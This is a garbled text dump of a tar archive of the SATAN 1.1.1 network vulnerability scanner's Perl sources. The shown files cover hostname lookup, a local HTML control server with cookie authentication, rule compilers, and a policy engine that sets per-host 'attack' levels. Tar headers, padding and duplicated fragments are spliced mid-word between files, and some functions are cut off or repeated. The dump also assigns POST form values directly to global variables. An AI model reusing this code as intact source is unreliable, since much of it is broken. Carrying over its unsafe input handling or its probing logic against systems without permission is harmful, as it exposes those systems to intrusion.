$old, $frag, $n, $trial); # First see if the name (or IP address) is in the DNS. if ($host =~ /\./ && ($frag = &get_host_name(&get_host_addr($host)))) { .$host = $frag; } # Can't do anything else for IP addresses. if ($host =~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) { .return ""; } # Can't do hostname completion when the originator is an IP address. if ($origin =~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) { .return $host; } # Assume an unqualified name is in the same domain as the originator. # if (($dot = index($host, ".")) < $[) { .return &get_host_name($host . substr($origin, index($origin, "."))); } $old = $dot; # Assume the hostname is trucated. foreach $trial ($origin, ".mil", ".edu", ".gov", ".net", ".org", ".com") { for ($dot = $old; length($frag = substr($host,$dot-$[)) > 1; $dot += $n) { # Match .fragment with (upper domain) of trial domain. if (($n = index($trial, $frag)) >= $[) { if ($fqdn = &get_host_name(substr($host, $[, $dot - $[) . substr($trial, $n))) { .. return $fqdn; ..} . } # Strip lowest .subdomain from .fragment and retry. last if (($n = index(substr($frag, $[ + 1), ".") + 1 - $[) < 1); } } # Unable to fix the hostname. # return ""; } # # Some scaffolding for stand-alone testing. # if ($running_under_satan) { require 'perl/get_host.pl'; } else { $running_under_satan = -1; require 'perllib/getopts.pl'; require 'perl/get_host.pl'; warn "fix_hostname.pl running in test mode"; $usage = "usage: fix_hostname partial_name complete_name\n"; &Getopts("v"); if ($#ARGV != 1) { .print STDERR $usage; .exit 1; } print &fix_hostname($ARGV[0], $ARGV[1]),"\n"; } 1; ($_); .} .&process_facts(); } # # Some scaffolsatan-1.1.1/perl/get_host.pl........................................................................ 600 . 465 . 506 . 3240 5742457003 11011. ....................................................................................... ................................................................................................................................................................................................................................................................. ............require 'perl/socket.pl'; # Lookup the FQDN for a host name or address with cacheing. # sub get_host_name { .local($host) = @_; .local($aliases, $type, $len, @ip, $a,$b,$c,$d); .# do cache lookup first .if (exists($host_name_cache{$host})) { ..return($host_name_cache{$host}); ..} .# if host is ip address .if ($host =~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) { ..($a,$b,$c,$d) = split(/\./, $host); ..@ip = ($a,$b,$c,$d); ..($host) = gethostbyaddr(pack("C4", @ip), &AF_INET); ..} .# if host is name, not ip address .else { ..($host, $aliases, $type, $len, @ip) = gethostbyname($host); ..($a,$b,$c,$d) = unpack('C4',$ip[0]); ..} .# success: .if ($host && @ip) { ..$host =~ tr /A-Z/a-z/; ..return $host_name_cache{$host} = $host; ..} .# failure: .else { ..return $host_name_cache{$host} = ""; ..} .} # # Look up host address wich cacheing # sub get_host_addr { .local($host) = @_; .local($aliases, $type, $len, @ip, $a,$b,$c,$d); .# do cache lookup first .if (exists($host_addr_cache{$host})) { ..return($host_addr_cache{$host}); ..} .# if host is name, not ip address .if ($host =~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) { ..return $host; ..} .else { ..($host, $aliases, $type, $len, @ip) = gethostbyname($host); ..($a,$b,$c,$d) = unpack('C4',$ip[0]); ..} .# success; want IP address .if (@ip) { ..return "$a.$b.$c.$d"; ..} .# failure: .else { ..return $host_addr_cache{$host} = ""; ..} .} # # Some scaffolding code for stand-alone testing. # if ($running_under_satan == 0) { .$running_under_satan = -1; .warn "get_host.pl running in test mode"; .$host = &get_host_name($ARGV[0]); print "get_host_name: $host\n"; .$host = &get_host_addr($ARGV[0]); print "get_host_addr: $host\n"; } 1; re 'perl/infer_facts.pl'; .require 'perl/drop_fact.pl'; .require 'perl/hosttype.pl'; .require 'perl/services.pl'; .require 'perl/severities.pl'; .require 'perl/trust.pl'; } else { .$running_under_satan = -1; .$debug = 1; .require 'perl/misc.pl'; .require 'perl/fix_hostname.pl'; .require 'perl/infer_todo.pl'; .require 'perl/infer_facts.pl'; .require satan-1.1.1/perl/getfqdn.pl......................................................................... 600 . 465 . 506 . 2147 5742457003 10632. ............................................................................................ ................................................................................................................................................................................................................................................................. .......# # Look up a host name the hard way, using nsloookup. Don't rely on the # gethostbyname() library routine, as there are too many broken NIS # setups. Return an empty string in case of errors. # # Stand-alone usage: getfqdn.pl hostname. # # version 1, Tue Mar 21 19:31:03 1995, last mod by wietse # require 'config/paths.pl'; require 'config/satan.cf'; sub getfqdn { .local($host) = @_; .local($result, $temp); .if ($host =~ /^[0-9.]+$/) { ..return $host unless ($temp = &get_host_name($host)); ..$host = $temp; .} .if ($dont_use_nslookup) { ..return &get_host_name($host); .} .if (!exists($getfqdn_cache{$host})) { ..open(NSLOOKUP, "$NSLOOKUP 2>/dev/null <<EOF\n$host\nEOF|") ...|| die "cannot run $NSLOOKUP: $!"; ..$result = ""; ..while(<NSLOOKUP>) { ...if (/name:\s+(\S+)/i) { ....($result = $1) =~ tr /A-Z/a-z/; ....last; ...} ..} ..close(NSLOOKUP); ..$getfqdn_cache{$host} = $result; .} .return($getfqdn_cache{$host}); } # # Some scaffolding code for stand-alone testing. # if ($running_under_satan == 0) { .$running_under_satan = 1; .require 'perl/get_host.pl'; .$host = &getfqdn($ARGV[0]); .print "$host\n"; } 1; .return $host; ..} .else { ..($host, $aliases, $type, $len, @ip) = gethostbyname($host); ..($a,$b,$c,$d) = unpack('C4',$ip[0]); ..} .# success; want IP address .if (@ip) { ..return "$a.$b.$c.$d"; ..} .# failure: .else { ..return $host_addr_cache{$host} = ""; ..} .} # # Some scaffolding code for stand-alone testing. # if ($running_under_satan == 0) { .$running_under_satan = -1; .warn "get_host.pl runnsatan-1.1.1/perl/hostname.pl........................................................................ 700 . 465 . 506 . 1032 5742457003 11011. .............................................................................. ................................................................................................................................................................................................................................................................. .....................# # file: hostname.pl # usage: $hostname = &'hostname; # # purpose: get hostname -- try method until we get an answer #.or return "Amnesiac!" # package hostname; sub main'hostname { if (!defined $hostname) { .$hostname = ( -x '/bin/hostname' && `/bin/hostname` ) .. || ( -x '/usr/ucb/hostname' && `/usr/ucb/hostname` ) .. || ( -x '/bin/uname' && `/bin/uname -n` ) .. || ( -x '/usr/bin/uuname' && `/usr/bin/uuname -l`) .. || 'Amnesiac! '; # trailing space is for chop .chop $hostname; } $hostname; } 1; kup) { ..return &get_host_name($host); .} .if (!exists($getfqdn_cache{$host})) { ..open(NSLOOKUP, "$NSLOOKUP 2>/dev/null <<EOF\n$host\nEOF|") ...|| die "cannot run $NSLOOKUP: $!"; ..$result = ""; ..while(<NSLOOKUP>) { ...if (/name:\s+(\S+)/i) { ....($result = $1) =~ tr /A-Z/a-z/; ....last; ...} ..} ..close(NSLOOKUP); ..$getfqdn_cache{$host} = $result; .} .return($getfqdn_cache{$host}); } # # Some scaffolding code for stand-alone testing. # if ($running_under_satan == 0) { .$runnsatan-1.1.1/perl/hosttype.pl........................................................................ 600 . 465 . 506 . 11302 5742457003 11072. ............................................................................................... ................................................................................................................................................................................................................................................................. ....# # infer_hosttype - classify host by banner, the dns HINFO record may be wrong. # Output to: # # $hosttype{$target}..operating system type per host # $sysclass{$type}..OS class that an OS type belongs to # $hosttype_flag..(*) # $systype_counts{type}..number of hosts per OS type # $systype_severities{type}.ditto, with at least one vulnerability # $sysclass_counts{class}.number of hosts per OS class # $sysclass_severities{class}.ditto, with at least one vulnerability # $hosts_by_systype{type}.string with hosts per OS type # $systypes_by_class{class}.string with OS types per OS class # # (*) Is reset whenever the $hosttype etc. tables are updated. To recalculate, # invoke make_hosttype_info_flag(). # # Standalone usage: perl hosttype.pl [satan_record_files...] # $hosttype_files = "rules/hosttype"; $hosttype_unknown = "unknown type"; $hosttype_notprobed = "not scanned"; sub build_infer_hosttype { local($files) = @_; local($type, $code, $file, $cond, $type, $class); $code = "sub infer_hosttype {\n"; $code .= "\tlocal(\$type);\n"; $code .= "\tif (\$service !~ /^(smtp|telnet|ftp)\$/) {\n\t\treturn;\n\t}\n"; $class = "other"; foreach $file (split(/\s+/, $files)) { .open(RULES, $file) || die "cannot open $file: $!"; .while (<RULES>) { . chop; . while (/\\$/) { ..chop; ..$_ .= <RULES>; ..chop; . } . s/#.*$//; . s/\s+$//; . next if /^$/; . if (/^CLASS\s+(.+)/i) { ..$class = $1; . } else { ..s/\bUNKNOWN\b/(HOSTTYPE eq "" || HOSTTYPE eq \"$hosttype_unknown\" || HOSTTYPE eq \"$hosttype_notprobed\")/; ..s/\bHOSTTYPE\b/\$hosttype{\$target}/g; ..s/@/\\@/g; ..($cond, $type) = split(/\t+/, $_, 2); ..$type = "\$1" if ($type eq ""); ..$code .= "\ .if ($cond) { ..\$type = $type; ..\$hosttype{\$target} = \$type; ..\$sysclass{\$type} = \"$class\"; ..\$hosttype_flag = 0; ..return; .} "; . } .} .close(RULES); } $code .= "\t\$hosttype{\$target} = \"\" ..if !exists(\$hosttype{\$target});\n}"; return $code; } # # Generate hosttype-dependent statistics. # sub make_hosttype_info { local($host, $class, $type, $count); if ($hosttype_flag > 0) { .return; } $hosttype_flag = time(); print "Rebuild host type statistics...\n" if $debug; &make_severity_info(); %hosts_by_systype = (); %systypes_by_class = (); %systype_severities = (); %systype_counts = (); %sysclass_severities = (); %sysclass_counts = (); for $host (keys %all_hosts) { .$hosttype{$host} = $hosttype_unknown . if ($host && $hosttype{$host} eq "" && &get_host_time($host) > 1); .$hosttype{$host} = $hosttype_notprobed . if ($host && $hosttype{$host} eq ""); } $sysclass{$hosttype_unknown} = "other"; $sysclass{$hosttype_notprobed} = "other"; for $type (sort keys %sysclass) { .$systype_severities{$type} = 0; .$sysclass_severities{$sysclass{$type}} = 0; } for $host (sort keys %hosttype) { .$type = $hosttype{$host}; .if ($type eq "") { . $type = $hosttype{$host} = $hosttype_unknown; .} .if (exists($severity_host_type_info{$host})) { . $systype_severities{$type}++; .} .$hosts_by_systype{$type} .= $host . "\n"; .$systype_counts{$type}++; } for $type (sort keys %sysclass) { .if (($count = $systype_counts{$type}) > 0) { . $class = $sysclass{$type}; . $systypes_by_class{$class} .= $type . "\n"; . $sysclass_counts{$class} += $count; . if ($systype_severities{$type}) { ..$sysclass_severities{$class} += $systype_severities{$type}; . } .} else { . delete($sysclass{$type}); .} } } # # Reset the host type tables. # sub clear_hosttype_info { %hosttype = (); %systype = (); %hosts_by_systype = (); %systypes_by_class = (); %systype_severities = (); %systype_counts = (); %sysclass_severities = (); %sysclass_counts = (); $hosttype_flag = 0; } # # Some scaffolding for stand-alone operation # if ($running_under_satan) { eval &build_infer_hosttype($hosttype_files); die "error in $hosttype_files: $@" if $@; } else { $running_under_satan = -1; $debug = 1; require 'perl/misc.pl'; # # Generate code from rules files. # $code = &build_infer_hosttype($hosttype_files); print "Code generated from $hosttype_files:\n\n"; print $code; eval $code; die "error in $hosttype_files: $@" if $@; # # Apply rules. # print "\nApplying rules to all SATAN records...\n"; while (<>) { .chop; .if (&satan_split($_) == 0) { . &infer_hosttype(); .} } &make_hosttype_info(); for (sort keys %hosttype) { .print "$hosttype{$_}.$_\n"; } print "Host class information:\n"; for $class (sort keys %systypes_by_class) { .print "$class."; .print join('.', split(/\n/, $systypes_by_class{$class})); .print "\n"; } } 1; # # Standalone usage: perl hosttype.pl [satan_record_files...] # $hosttype_files = "rules/hosttype"; $hosttype_unknown = "unknown type"; $hosttype_notprobed = "not scanned"; sub build_infer_hosttype { local($files) = @_; local($type, $code, $file, $cond, $type, $class); $code = "sub infer_hosttype {\satan-1.1.1/perl/html.pl............................................................................ 700 . 465 . 506 . 24204 5742520506 10164. ................................................................... ................................................................................................................................................................................................................................................................. ................................#!/usr/local/bin/perl5 # # version 1, Thu Mar 23 21:53:31 1995, last mod by wietse # # # Run an off-the-shelf HTML client against a dedicated HTML server. The # server executes PERL files that are specified in HTML requests. # # Authentication is magic-cookie style via the file system. This should # be good enough: the client-server conversation never goes over the # network so the magic cookie cannot be stolen by a network sniffer. # # Values in POST attribute-value lists are assigned to the corresponding # global PERL variables. See &process_html_request() for details. # sub html { .local($helper, $wd, $host); .# .# Start the HTML server and generate the initial cookie for .# client-server authentication. .# .$running_from_html = 1; .chmod 0700, <~/.mosaic*>;.# Yuck! .chmod 0700, <~/.netsca*>;.# Yuck! .chmod 0700, <~/.MCOM*>;..# Yuck! .&start_html_server(); .&make_password_seed(); .# .# These strings are used in, among others, PERL-to-HTML scripts. .# .$wd = `pwd`; .chop $wd; .$html_root = "$wd/html"; .$start_page = "satan.html"; .$THIS_HOST = &getfqdn(&hostname()); .die "Can't find my own hostname: set \$dont_use_nslookup in $SATAN_CF\n" . unless $THIS_HOST; .$HTML_ROOT = "file://localhost$html_root"; .$HTML_SERVER = "http://$THIS_HOST:$html_port/$html_password/$html_root"; .$HTML_STARTPAGE = "$HTML_ROOT/$start_page"; .# .# Some obscurity. The real security comes from magic cookies. .# .$html_client_addresses = find_all_addresses($THIS_HOST) || ..die "Unable to find all my network addresses\n"; .for (<$html_root/*.pl>) { . s/\.pl$//; . unlink "$_.html"; . open(HTML, ">$_.html") .. || die "cannot write $_.html: $!\n"; . select HTML; . do "$_.pl"; . close HTML; . select STDOUT; . die $@ if $@; .} .# .# Fork off the HTML client, and fork off a server process that .# handles requests from that client. The parent process waits .# until the client exits and terminates the server. .# .print "Starting $MOSAIC...\n" if $debug; .if (($client = fork()) == 0) { ..foreach (keys %ENV) { ...delete $ENV{$_} if (/proxy/i && !/no_proxy/i); ..} ..exec($MOSAIC, "$HTML_STARTPAGE") ...|| die "cannot exec $MOSAIC: $!"; .} .if (($server = fork()) == 0) { ..if (($helper = fork()) == 0) { ...alarm 3600; ...&patience(); ..} ..&init_satan_data(); ..&read_satan_data() unless defined($opt_i); ..kill 'TERM',$helper; ..$SIG{'PIPE'} = 'IGNORE'; ..for (;;) { ...accept(CLIENT, SOCK) || die "accept: $!"; ...select((select(CLIENT), $| = 1)[0]); ...&process_html_request(); ...close(CLIENT); ..} .} .# .# Wait until the client terminates, then terminate the server. .# .close(SOCK); .waitpid($client, 0); .kill('TERM', $server); .exit; } # # Compute a hard to predict number for client-server authentication. Exploit # UNIX parallelism to improve unpredictability. We use MD5 only to compress # the result. # sub make_password_seed { .local($command); .die "Cannot find $MD5. Did you run a \"reconfig\" and \"make\"?\n" ..unless -x "$MD5"; .$command = "ps axl&ps -el&netstat -na&netstat -s&ls -lLRt /dev*&w"; .open(SEED, "($command) 2>/dev/null | $MD5 |") ..|| die "cannot run password command: $!"; .($html_password = <SEED>) || die "password computation failed: $!"; .close(SEED); .chop($html_password); } # # Set up a listener on an arbitrary port. There is no good reason to # listen on a well-known port number. # sub start_html_server { .local($sockaddr, $proto, $junk); .$sockaddr = 'S n a4 x8'; .($junk, $junk, $proto) = getprotobyname('tcp'); .socket(SOCK, &AF_INET, &SOCK_STREAM, $proto) || die "socket: $!"; .listen(SOCK, 1) || die "listen: $!"; .($junk, $html_port) = unpack($sockaddr, getsockname(SOCK)); } # # Process one client request. We expect the client to send stuff that # begins with: # #.command /password/perl_script junk # # Where perl_script is the name of a perl file that is executed via # do "perl_script"; # # In case of a POST command the values in the client's attribute-value # list are assigned to the corresponding global PERL variables. # sub process_html_request { .local($request, $command, $script, $magic, $url, $peer); .local(%args); .# .# Parse the command and URL. Update the default file prefix. .# .$request = <CLIENT>; .print $request if $debug; .($command, $url) = split(/\s+/, $request); .if ($command eq "" || $command eq "QUIT") { ..return; .} .($junk, $magic, $script) = split(/\//, $url, 3); .($script, $html_script_args) = split(',', $script, 2); .($HTML_CWD = "file:$script") =~ s/\/[^\/]*$//; .# .# Make sure they gave us the right magic number. .# .if ($magic ne $html_password) { ..&bad_html_magic($request); ..return; .} .# .# Assume the password has leaked out when the following happens. .# .$peer = &get_peer_addr(CLIENT); .die "SATAN password from unauthorized client: $peer\n" ..unless is_member_of($peer, $html_client_addresses); .die "Illegal URL: $url received from: $peer\n" ..if index($script, "..") >= $[ ..|| index($script, "$html_root/") != $[ ..|| $script !~ /\.pl$/; .# .# Warn them when the browser leaks parent URLs to web servers. .# .while (<CLIENT>) { ..if (!$cookie_leak_warning && /$html_password/) { ...&cookie_leak_warning(); ...return; ..} ..last if (/^\s+$/); .} .if ($command eq "GET") { ..perl_html_script($script); .} elsif ($command eq "POST") { ..# ..# Process the attribute-value list. ..# ..if ($_ = <CLIENT>) { ...s/\s+$//; ...s/^/\n/; ...s/&/\n/g; ...$html_post_attributes = ''; ...$* = 1; ...for (split(/(%[0-9][0-9A-Z])/, $_)) { ....$html_post_attributes .= (/%([0-9][0-9A-Z])/) ? .....pack('c',hex($1)) : $_; ...} ...%args = ('_junk_', split(/\n([^=]+)=/, $html_post_attributes)); ...delete $args{'_junk_'}; ...for (keys %args) { ....print "\$$_ = $args{$_}\n" if $debug; ....${$_} = $args{$_}; ...} ...perl_html_script($script); ..} else { ...&bad_html_form($script); ..} .} else { ..&bad_html_command($request); .} } # # Map IP to string. # sub inet_ntoa { .local($ip) = @_; .local($a, $b, $c, $d); .($a, $b, $c, $d) = unpack('C4', $ip); .return "$a.$b.$c.$d"; } # # Look up peer address and translate to string form. # sub get_peer_addr { .local($peer) = @_; .local($junk, $inet); .($junk, $junk, $inet) = unpack('S n a4', getpeername($peer)); .return &inet_ntoa($inet); } # # Wrong magic number. # sub bad_html_magic { .local($request) = @_; .local($peer); .$peer = &get_peer_addr(CLIENT); .print STDERR "bad request from $peer: $request\n"; print CLIENT <<EOF <HTML> <HEAD> <TITLE>Bad client authentication code</TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1>Bad client authentication code</H1> The command: <TT>$request</TT> was not properly authenticated. </BODY> </HTML> EOF } # # Unexpected HTML command. # sub bad_html_command { .local($request) = @_; .print CLIENT <<EOF <HTML> <HEAD> <TITLE>Unknown command</TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1>Unknown command</H1> The command <TT>$request<TT> was not recognized. </BODY> </HTML> EOF } # # Execute PERL script with extreme prejudice. # sub perl_html_script { .local($script) = @_; .if (! -e $script) { ..print CLIENT <<EOF <HTML> <HEAD> <TITLE>File not found</TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1>File not found</H1> The file <TT>$script</TT> does not exist or is not accessible. </BODY> </HTML> EOF ;..return; .} .do $script; .if ($@ && ($@ ne "\n")) { ..print CLIENT <<EOF <HTML> <HEAD> <TITLE>Command failed</TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1>Command failed</H1> $@ </BODY> </HTML> EOF .} } # # Missing attribute list # sub bad_html_form { .local($script) = @_; .print CLIENT <<EOF <HTML> <HEAD> <TITLE>No attribute list</TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1>No attribute list</H1> No attribute list was found. </BODY> </HTML> EOF } # # Scaffolding for stand-alone testing. # if ($running_under_satan == 1) { .require 'perl/socket.pl'; .require 'config/paths.pl'; .require 'perl/hostname.pl'; .require 'perl/getfqdn.pl'; .require 'config/satan.cf'; } else { .$running_under_satan = 1; .require 'perl/socket.pl'; .require 'config/paths.pl'; .require 'perl/hostname.pl'; .require 'perl/getfqdn.pl'; .require 'config/satan.cf'; .&html(); } # # Give them something to read while the server is initializing. # sub patience { .for (;;) { ..accept(CLIENT, SOCK) || die "accept: $!"; ..<CLIENT>; ..print CLIENT <<EOF <HTML> <HEAD> <TITLE>Initialization in progress</TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1>Initialization in progress</H1> SATAN is initializing, please try again later. </BODY> </HTML> EOF ; ..close(CLIENT); .} } # Look up all IP addresses listed for this host name, so that we can # filter out requests from non-local clients. Doing so offers no real # security, because network address information can be subverted. # # All client-server communication security comes from the magic cookies # that are generated at program startup time. Client address filtering # adds an additional barrier in case the cookie somehow leaks out. sub find_all_addresses { .local($host) = @_; .local($junk, $result); .($junk, $junk, $junk, $junk, @all_addresses) = gethostbyname($host); .for (@all_addresses) { $result .= &inet_ntoa($_) . " "; } .return $result; } sub is_member_of { .local($elem, $list) = @_; .for (split(/\s+/, $list)) { return 1 if ($elem eq $_); } .return 0; } sub cookie_leak_warning { .print CLIENT <<EOF; <HTML> <HEAD> <TITLE>Warning - SATAN Password Disclosure</TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1><IMG SRC="$HTML_ROOT/images/satan.gif" ALT="[SATAN Image]"> Warning - SATAN Password Disclosure</H1> <HR> <H3> Your Hypertext viewer may reveal confidential information when you contact remote WWW servers from within SATAN. <p> For this reason, SATAN advises you to not contact other WWW servers from within SATAN. <p> For more information, see <a href="$HTML_ROOT/tutorials/vulnerability/SATAN_password_disclosure.html">the SATAN vulnerability tutorial</a>. <p> This message will appear only once per SATAN session. <p> In order to proceed, send a <i>reload</i> command (Ctrl-R with Lynx), or go back to the previous screen and select the same link or button again. </H3> </BODY> </HTML> EOF .$cookie_leak_warning = 1; } 1; bad_html_magic { .local($request) = @_; .local($peer); .$peer = &get_peer_addr(CLIENT); .print STDERR "bad request from $peer: $request\n"; print CLIENT <<EOF <HTML> <HEAD> <TITLE>Bad client authentication code</TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1>Bad client authentication code</H1> The command: <TT>$request</TT> was not properlysatan-1.1.1/perl/infer_facts.pl..................................................................... 600 . 465 . 506 . 3157 5742457003 11467. ...................................................... ................................................................................................................................................................................................................................................................. .............................................# # Usage: &infer_facts(); # # Apply the rules in $infer_fact_files to the global $target..$text variables # (and to any other globals that happen to be available) and generate new # facts. # # Standalone usage: perl infer_fact.pl [satan_record_files...] # $infer_fact_files = "rules/facts"; sub build_infer_facts { local($files) = @_; local($code, $cond, $fact); $code = "sub infer_facts {\n"; foreach $file (split(/\s+/, $files)) { .open(RULES, $file) || die "cannot open $file: $!"; .while (<RULES>) { . chop; . while (/\\$/) { ..chop; ..$_ .= <RULES>; ..chop; . } . s/#.*$//; . s/\s+$//; . next if /^$/; . s/@/\\@/g; . ($cond, $fact) = split(/\t+/, $_, 2); . $code .= "\tif ($cond) {\n\t\t&add_fact(\"$fact\");\n\t}\n"; .} .close(RULES); } $code .= "}\n"; return $code; } # # Some scaffolding for stand-alone operation # if ($running_under_satan) { eval &build_infer_facts($infer_fact_files); die "error in $infer_fact_files: $@" if $@; } else { $running_under_satan = -1; require 'perl/misc.pl'; eval "sub add_fact { local(\$fact) = \@_; print \"Add-fact: \$fact\n\"; }"; die "error in $infer_fact_files: $@" if $@; # # Build satan rules and include them into the running code. # $code = &build_infer_facts($infer_fact_files); print "Code generated from $infer_fact_files:\n\n"; print $code; eval $code; # # Apply rules. # print "\nApplying rules to all SATAN records...\n"; while (<>) { .chop; .if (&satan_split($_)) { . warn "Ill-formed fact: $_\n"; .} else { . &infer_facts(); .} } } 1; read while the server is initializing. # sub patience { .for (;;) { ..accept(CLIENT, SOCK) || die "accept: $!"; ..<CLIENT>; ..print CLIENT <<EOF <HTML> <HEAD> <TITLE>Initialization in progress</TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1>Initialization in progress</H1> SATAN is initializing, please try again later. </BODY> </HTML> EOF ; ..close(CLIENT); .} } # Look upsatan-1.1.1/perl/infer_todo.pl...................................................................... 600 . 465 . 506 . 4562 5742457003 11335. ............................................................................................ ................................................................................................................................................................................................................................................................. .......# # Usage: &infer_todo() # # Applies rules in $infer_todo_files to the global $target..$text # variables (and to all other globals that are available) and # generates new probes for the data collection engine. # # Standalone usage: perl infer_todo.pl [satan_record_files...] # # version 1, Tue Mar 21 20:25:31 1995, last mod by wietse # $infer_todo_files = "rules/todo"; sub build_infer_todo{ local($files) = @_; local($cond, $todo, $func, $host, $tool, $args, $args1, $args2); $code = "sub infer_todo {\n"; $code .= ".local(\$junk);\n"; foreach $file (split(/\s+/, $files)) { .open(RULES, $file) || die "cannot open $file: $!"; .while (<RULES>) { . chop; . while (/\\$/) { ..chop; ..$_ .= <RULES>; ..chop; . } . s/#.*$//; . next if /^\s*$/; . s/@/\\@/g; . ($cond, $todo) = split(/\t+/, $_, 2); . ($host, $tool, $args) = split(/\s+/, $todo, 3); . $host ne "" || die "no host in $file: cond=$cond, todo=$todo\n"; . $tool ne "" || die "no tool in $file: cond=$cond, todo=$todo\n"; . if ($args =~ /\*\s*(.+)/) { ..$func = "add_todo_ignore_args"; ..$args = $1; . } else { ..$func = "add_todo"; . } . $code .= "\tif ($cond) {\n\t\t&$func($host,$tool"; . ($args ne "") && ($code .= ",$args"); . $code .= ");\n\t}\n"; .} .close(RULES); } $code .= "\n}\n"; return $code; } # # Some scaffolding for stand-alone operation # if ($running_under_satan) { eval &build_infer_todo($infer_todo_files); die "error in $infer_todo_files: $@" if $@; } else { $running_under_satan = -1; require 'perl/misc.pl'; require 'perl/fix_hostname.pl'; warn "infer_todo.pl running in test mode"; eval "sub add_todo { local(\$target,\$tool,\$args) = \@_; .print \"add_todo: \$target \$tool \$args\\n\"; }\n"; eval "sub add_todo_ignore_args { local(\$target,\$tool,\$args) = \@_; .print \"add_todo_ignore_args: \$target \$tool \$args\\n\"; }\n"; # # Build satan rules and include them into the running code. # $code = &build_infer_todo($infer_todo_files); print "Code generated from $infer_todo_files:\n\n"; print $code; eval $code; die "error in $infer_todo_files: $@" if $@; # # Apply rules. # print "\nApplying rules to all SATAN records...\n"; while (<>) { .chop; .if (&satan_split($_)) { . warn "Ill-formed record: $_\n"; .} else { . &infer_todo(); .} } } 1; ; print $code; eval $code; # # Apply rules. # print "\nApplying rules to all SATAN records...\n"; while (<>) { .csatan-1.1.1/perl/misc.pl............................................................................ 600 . 465 . 506 . 3321 5742457003 10130. ................................................................................................... ................................................................................................................................................................................................................................................................. # # miscellaneous perl functions that don't belong anywhere else # # # Symbolic offsets for SATAN record fields. # $TARGET_FIELD = 0; $SERVICE_FIELD = 1; $STATUS_FIELD = 2; $SEVERITY_FIELD = 3; $TRUSTEE_FIELD = 4; $TRUSTED_FIELD = 5; $SERVICE_OUTPUT_FIELD = 6; $TEXT_FIELD = 7; $SATAN_FIELDS = 8; # strip leading directory and optional suffix information. sub basename { local($path, $suffix) = @_; $path =~ s:.*/::; if ($suffix) { .$path =~ s/$suffix$//; } return $path; } # print to string sub satan_string{ return "$target|$service|$status|$severity|$trustee|$trusted|$service_output|$text"; } # print the output for the brain/optimizer sub satan_print { print "$target|$service|$status|$severity|$trustee|$trusted|$service_output|$text\n"; } # format the output for the brain/optimizer sub satan_text { return "$target|$service|$status|$severity|$trustee|$trusted|$service_output|$text"; } # breakup record into its constituent fields sub satan_split { local ($line) = @_; return ((($target,$service,$status,$severity,$trustee,$trusted,$service_output,$text) = split(/\|/, $line)) != $SATAN_FIELDS); } # count the number of elements in an associative array. sub sizeof { local(*which) = @_; local(@keywords); @keywords = keys %which; return($#keywords + 1); } # # ensure that all paths in paths.pl file actually exist and are executable sub check_paths { local($caps, $command, $path, $null); die "Can't open paths.pl\n" unless open(PATHS, "paths.pl"); while (<PATHS>) { .($caps, $command) = split(/=/, $_); .($null, $path, $null) = split(/\"/, $command); .die "$path is *not* executable - necessary for SATAN to run\n" ..unless -x $path; .} close(PATHS); } 1; "accept: $!"; ..<CLIENT>; ..print CLIENT <<EOF <HTML> <HEAD> <TITLE>Initialization in progress</TITLE> <LINK REV="made" HREF="mailto:satan\@fish.com"> </HEAD> <BODY> <H1>Initialization in progress</H1> SATAN is initializing, please try again later. </BODY> </HTML> EOF ; ..close(CLIENT); .} } # Look upsatan-1.1.1/perl/policy-engine.pl................................................................... 600 . 465 . 506 . 3657 5742457003 11753. ............................................................................................ ................................................................................................................................................................................................................................................................. .......# # version 1, Tue Mar 21 20:21:33 1995, last mod by wietse # sub policy_engine { local($target, $proximity) = @_; # # Respect the maximal proximity level. # if ($proximity > $max_proximity_level) { .print "policy: pruning $target via proximity level\n" if $debug; .return -1; } # # Do not attack "verboten" hosts. # if (&target_is_exception($target)) { .print "policy: pruning $target via exception\n" if $debug; .return -1; } # # attacks tend to get weaker the farther away from home; do they # wither and die, or keep going at a low level? # $new_attack_level = $attack_level - ($proximity * $proximity_descent); if ($new_attack_level < 0) { .if (!$sub_zero_proximity) { ..print "policy: pruning $target via attack level < 0\n"; ..return -1; ..} .else { ..$new_attack_level = 0; ..} .} print "policy: $target prox $proximity level $new_attack_level\n" if $debug; return $new_attack_level; } # # Does target match list of shell-like patterns? # sub match_host { local($target, $patterns) = @_; local($pattern); for $pattern (split(/(,|\s)+/, $patterns)) { .$pattern =~ s/\.$//;.# strip trailing dot .$pattern =~ s/^\.//;.# strip leading dot .$pattern =~ s/\./\\./g;.# quote dots .$pattern =~ s/\*/.*/g;.# translate regexp star to shell star .if ($pattern =~ /^\d+/) { . return 1 if ($all_hosts{$target}{'IP'} =~ /^$pattern\b/); .} else { . return 1 if ($target =~ /\b$pattern$/); .} } return 0; } # # don't want to attack certain sites, like .mil, etc. # sub target_is_exception { local($target) = @_; local($pattern); # # if this is set, only attack things that contain this string: if ($only_attack_these && !&match_host($target, $only_attack_these)) { .return 1; } # # if this is set, don't attack things that contain this string: if ($dont_attack_these && &match_host($target, $dont_attack_these)) { .return 1; } # # else, nothing is wrong, go for it... return 0; } 1; g, please try again later. </BODY> </HTML> EOF ; ..close(CLIENT); .} } # Look upsatan-1.1.1/perl/reconfig.pl........................................................................ 700 . 465 . 506 . 7647 5742457003 11011. ............................................................................................ ................................................................................................................................................................................................................................................................. .......#!/usr/local/bin/perl # Usage: reconfig [file] # # This replaces the program paths (e.g. /bin/awk) in SATAN with an # alternate path that is found in the file "file.paths". It also finds # perl5 (or at least tries!) and changes the path in all the stand-alone # perl programs. # # all the HTML browsers we know about, IN ORDER OF PREFERENCE! @all_www= ("netscape", "Mosaic", "xmosaic", "lynx"); # # Potential directories to find commands; first, find the user's path... $PATH = $ENV{"PATH"}; # additional dirs; 